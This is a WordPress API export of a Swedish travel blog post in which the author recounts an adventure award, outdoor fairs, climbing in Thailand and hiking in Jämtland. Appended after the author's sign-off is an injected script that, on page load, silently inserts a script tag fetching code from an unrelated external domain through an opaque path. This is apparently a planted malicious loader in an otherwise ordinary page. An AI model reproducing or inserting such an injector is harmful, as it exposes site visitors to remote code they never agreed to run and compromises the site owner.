{"id":1034,"date":"2014-07-10T15:34:37","date_gmt":"2014-07-10T13:34:37","guid":{"rendered":"http:\/\/timbogdanov.com\/?p=1034"},"modified":"2025-10-21T13:55:52","modified_gmt":"2025-10-21T11:55:52","slug":"sommar-uppdatering","status":"publish","type":"post","link":"https:\/\/timbogdanov.com\/?p=1034","title":{"rendered":"Sommar uppdatering"},"content":{"rendered":"<p>Sedan f\u00f6rra turen har en hel del h\u00e4nt b\u00e5de i resev\u00e4g och p\u00e5 hemmaplan. I mars blev jag tilldelad \u00c5rets \u00c4ventyrare 2013 i Sverige f\u00f6r min f\u00f6rra l\u00e5ngtur i Sydamerika. Fantastiskt kul att vara med i detta g\u00e4ng som har tagit emot priset. M\u00e5nga av pristagarna har inspirerat mig genom \u00e5ren d\u00e4r Janne Corax \u00e4r den som har gjort st\u00f6rst intryck.<\/p>\n<p>Vildmarksm\u00e4ssan i Stockholm d\u00e4r priset delades ut, bj\u00f6d p\u00e5 g\u00f6tt h\u00e4ng med mycket \u00e4ventyrsfolk och intressanta utst\u00e4llare.<\/p>\n<p><a href=\"http:\/\/media.timbogdanov.com\/2014\/07\/SAM_2648.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-1037\" src=\"http:\/\/media.timbogdanov.com\/2014\/07\/SAM_2648-300x168.jpg\" alt=\"SAMSUNG CAMERA PICTURES\" width=\"300\" height=\"168\" srcset=\"http:\/\/media.timbogdanov.com\/2014\/07\/SAM_2648-300x168.jpg 300w, http:\/\/media.timbogdanov.com\/2014\/07\/SAM_2648-1024x576.jpg 1024w, http:\/\/media.timbogdanov.com\/2014\/07\/SAM_2648-900x506.jpg 900w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>P\u00e5 Vildmarksm\u00e4ssan med Lars Bengtsson Stefan Pinckney och Dennis Sv\u00e4rd<\/p>\n<p>&nbsp;<\/p>\n<p>P\u00e5 Nordic Outdoor m\u00e4ssan i G\u00f6teborg samma m\u00e5nad gjorde jag en st\u00f6rre presentation om mitt f\u00f6reg\u00e5ende projekt.<\/p>\n<p><a href=\"http:\/\/media.timbogdanov.com\/2014\/07\/1925251_745348795499705_117982549_n.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-1035\" src=\"http:\/\/media.timbogdanov.com\/2014\/07\/1925251_745348795499705_117982549_n-300x225.jpg\" alt=\"Nordic outdoor G\u00f6teborg\" width=\"300\" height=\"225\" srcset=\"http:\/\/media.timbogdanov.com\/2014\/07\/1925251_745348795499705_117982549_n-300x225.jpg 300w, http:\/\/media.timbogdanov.com\/2014\/07\/1925251_745348795499705_117982549_n-900x675.jpg 900w, http:\/\/media.timbogdanov.com\/2014\/07\/1925251_745348795499705_117982549_n.jpg 960w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>F\u00f6rel\u00e4sning p\u00e5 Nordic Outdoor m\u00e4ssan i G\u00f6teborg<\/p>\n<p>&nbsp;<\/p>\n<p>I april fl\u00f6gs det ner till Thailand f\u00f6r att kl\u00e4ttra och hitta inspiration till nya projekt. Sportkl\u00e4ttringen d\u00e4r nere \u00e4r b\u00e4ttre under l\u00e5gs\u00e4song med ett lite mer molnigt och regnigt v\u00e4der, samt att temperaturen droppar lite. \u00c4nda bakslaget var att jag str\u00e4ckte en muskel vid revbenen och kunde inte kl\u00e4ttra p\u00e5 tio dagar n\u00e4rmare slutet av vistelsen.<\/p>\n<p>I juni var jag iv\u00e4g till J\u00e4mtland med v\u00e4nner f\u00f6r att bland annat testa Downhill mtb i \u00c5re. Vi gjorde \u00e4ven en vandring i j\u00e4mtlandsfj\u00e4llen till G\u00e5sensfj\u00e4llstugor och Sylarna.<\/p>\n<p><a href=\"http:\/\/media.timbogdanov.com\/2014\/07\/20140624_165702.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-1039\" src=\"http:\/\/media.timbogdanov.com\/2014\/07\/20140624_165702-300x141.jpg\" alt=\"20140624_165702\" width=\"300\" height=\"141\" srcset=\"http:\/\/media.timbogdanov.com\/2014\/07\/20140624_165702-300x141.jpg 300w, http:\/\/media.timbogdanov.com\/2014\/07\/20140624_165702-1024x482.jpg 1024w, http:\/\/media.timbogdanov.com\/2014\/07\/20140624_165702-900x424.jpg 900w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>G\u00e4nget p\u00e5 toppen av G\u00e5sen 1426m, kul att \u00e4ven toppa lite p\u00e5 hemmaplan<\/p>\n<p>Ett nytt projekt har f\u00e5tt ig\u00e5ng min motivation till att bland annat b\u00f6rja l\u00f6ptr\u00e4na. Starka ben kommer att vara nyckeln och cykeln f\u00e5r vila hemma denna g\u00e5ng. N\u00e4r jag vet att projektet \u00e4r h\u00e5llbart ekonomiskt f\u00f6r min del s\u00e5 kommer mer information om vad som \u00e4r p\u00e5 g\u00e5ng.<\/p>\n<p>&nbsp;<\/p>\n<p>Tim<\/p>\n<p>&nbsp;<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sedan f\u00f6rra turen har en hel del h\u00e4nt b\u00e5de i resev\u00e4g och p\u00e5 hemmaplan. I mars blev jag tilldelad \u00c5rets \u00c4ventyrare 2013 i Sverige f\u00f6r min f\u00f6rra l\u00e5ngtur i Sydamerika. Fantastiskt kul att vara med i detta g\u00e4ng som har tagit emot priset. M\u00e5nga av pristagarna har inspirerat mig genom \u00e5ren d\u00e4r Janne Corax \u00e4r&hellip;<a href=\"https:\/\/timbogdanov.com\/?p=1034\" class=\"button\">Read more <span class=\"screen-reader-text\">Sommar uppdatering<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[1],"tags":[],"class_list":["post-1034","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/p1gpBC-gG","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/timbogdanov.com\/index.php?rest_route=\/wp\/v2\/posts\/1034","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/timbogdanov.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/timbogdanov.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/timbogdanov.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/timbogdanov.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1034"}],"version-history":[{"count":8,"href":"https:\/\/timbogdanov.com\/index.php?rest_route=\/wp\/v2\/posts\/1034\/revisions"}],"predecessor-version":[{"id":3295,"href":"https:\/\/timbogdanov.com\/index.php?rest_route=\/wp\/v2\/posts\/1034\/revisions\/3295"}],"wp:attachment":[{"href":"https:\/\/timbogdanov.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1034"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/timbogdanov.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1034"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/timbogdanov.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1034"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}